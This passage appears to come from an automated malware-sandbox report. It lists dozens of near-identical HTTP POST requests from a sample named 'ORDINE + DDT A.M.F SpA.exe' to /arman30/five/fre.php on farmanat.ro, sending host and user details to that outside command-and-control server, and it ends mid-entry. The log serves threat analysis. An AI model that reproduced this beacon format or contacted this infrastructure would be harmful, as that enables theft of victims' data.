                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              70192.168.11.2049906176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:45.392079115 CET6406OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:45.425666094 CET6406OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:45.483957052 CET6407INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              700192.168.11.2050545176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:03.513998985 CET7285OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:03.547540903 CET7285OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:03.598150969 CET7285INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              701192.168.11.2050546176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:04.015227079 CET7286OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:04.049458981 CET7286OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:04.102054119 CET7287INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              702192.168.11.2050547176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:04.523262978 CET7287OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:04.556833029 CET7288OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:04.608227968 CET7288INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              703192.168.11.2050548176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:05.030325890 CET7289OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:05.064660072 CET7289OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:05.115741014 CET7289INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              704192.168.11.2050549176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:05.501409054 CET7290OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:05.535341024 CET7290OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:05.585587025 CET7291INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              705192.168.11.2050553176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:05.963027000 CET7292OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:05.996619940 CET7292OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:06.046257973 CET7292INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              706192.168.11.2050554176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:06.473005056 CET7293OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:06.506829023 CET7293OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:06.556282043 CET7294INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              707192.168.11.2050555176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:06.918600082 CET7294OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:06.951936007 CET7294OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:07.002161026 CET7295INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              708192.168.11.2050556176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:07.389478922 CET7296OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:07.423141956 CET7296OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:07.487277985 CET7296INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              709192.168.11.2050557176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:07.893918037 CET7297OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:07.928214073 CET7297OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:07.983906984 CET7298INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              71192.168.11.2049907176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:45.989299059 CET6408OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:46.023303032 CET6408OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:46.079950094 CET6408INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              710192.168.11.2050558176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:08.406130075 CET7298OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:08.439901114 CET7298OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:08.498502970 CET7299INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              711192.168.11.2050559176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:08.906487942 CET7300OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:08.940051079 CET7300OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:08.998106003 CET7300INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              712192.168.11.2050560176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:09.414303064 CET7301OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:09.448623896 CET7301OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:09.501857996 CET7301INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              713192.168.11.2050561176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:09.910267115 CET7302OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:09.943825006 CET7302OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:09.999290943 CET7303INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              714192.168.11.2050562176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:10.396250963 CET7304OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:10.430008888 CET7304OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:10.480978966 CET7304INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              715192.168.11.2050563176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:10.902122974 CET7305OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:10.935837984 CET7305OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:10.993756056 CET7305INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              716192.168.11.2050564176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:11.424071074 CET7306OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:11.457566977 CET7306OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:11.508637905 CET7307INHTTP/1.1 404 Not Found
                                              Server: nginx
